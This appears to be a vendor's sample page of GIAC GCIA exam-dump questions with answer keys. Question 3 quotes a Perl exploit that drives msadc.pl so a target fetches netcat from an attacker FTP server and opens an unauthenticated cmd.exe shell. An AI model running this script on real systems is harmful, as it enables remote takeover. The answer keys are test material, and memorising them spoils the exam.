GIAC GCIA Exam Actual Questions

Name: GIAC Certified Intrusion Analyst
Brand: QA4Exam
SKU: GCIA
Price: 30 USD
Availability: InStock
Rating: 4.8 (290 reviews)

The questions for GCIA were last updated on Oct 2, 2024.

Viewing page 1 out of 73 pages.
Viewing questions 1-5 out of 364 questions

Unlock Access to All 364 Questions & Answers

Question No. 1

Which of the following tools is described below?

It is a set of tools that are used for sniffing passwords, e-mail, and HTTP traffic. Some of its tools include arpredirect, macof, tcpkill, tcpnice, filesnarf, and mailsnarf. It is highly effective for sniffing both switched and shared networks. It uses the arpredirect and macof tools for switching across switched networks. It can also be used to capture authentication information for FTP, telnet, SMTP, HTTP, POP, NNTP, IMAP, etc.

ALIDS

BDsniff

CCain

DLibnids

Show Answer

Correct Answer: B

Question No. 2

Which of the following algorithms is used as a default algorithm for ESP extension header in IPv6?

APropagating Cipher Block Chaining (PCBC) Mode

BCipher Block Chaining (CBC) Mode

CCipher Feedback (CFB) Mode

DElectronic Codebook (ECB) Mode

Show Answer

Correct Answer: B

Question No. 3

Adam, a malicious hacker performs an exploit, which is given below:

#################################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#################################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h

$host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system

("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");

system("perl

msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get

hacked.

html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is

downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is

finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";

#system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

AOpens up a SMTP server that requires no username or password

BCreates a share called 'sasfile' on the target system

CCreates an FTP server with write permissions enabled

DOpens up a telnet listener that requires no username or password

Show Answer

Correct Answer: D

Question No. 4

Which of the following methods is used by forensic investigators to acquire an image over the network in a secure manner?

ADOS boot disk

BEnCase with a hardware write blocker

CLinux Live CD

DSecure Authentication for EnCase (SAFE)

Show Answer

Correct Answer: D

Question No. 5

John works as a Network Security Administrator for NetPerfect Inc. The manager of the company has told John that the company's phone bill has increased drastically. John suspects that the company's phone system has been cracked by a malicious hacker. Which attack is used by malicious hackers to crack the phone system?

ASequence++ attack

BPhreaking

CMan-in-the-middle attack

DWar dialing

Show Answer

Correct Answer: B

Unlock All Questions for GIAC GCIA Exam

Full Exam Access, Actual Exam Questions, Validated Answers, Anytime Anywhere, No Download Limits, No Practice Limits

Get All 364 Questions & Answers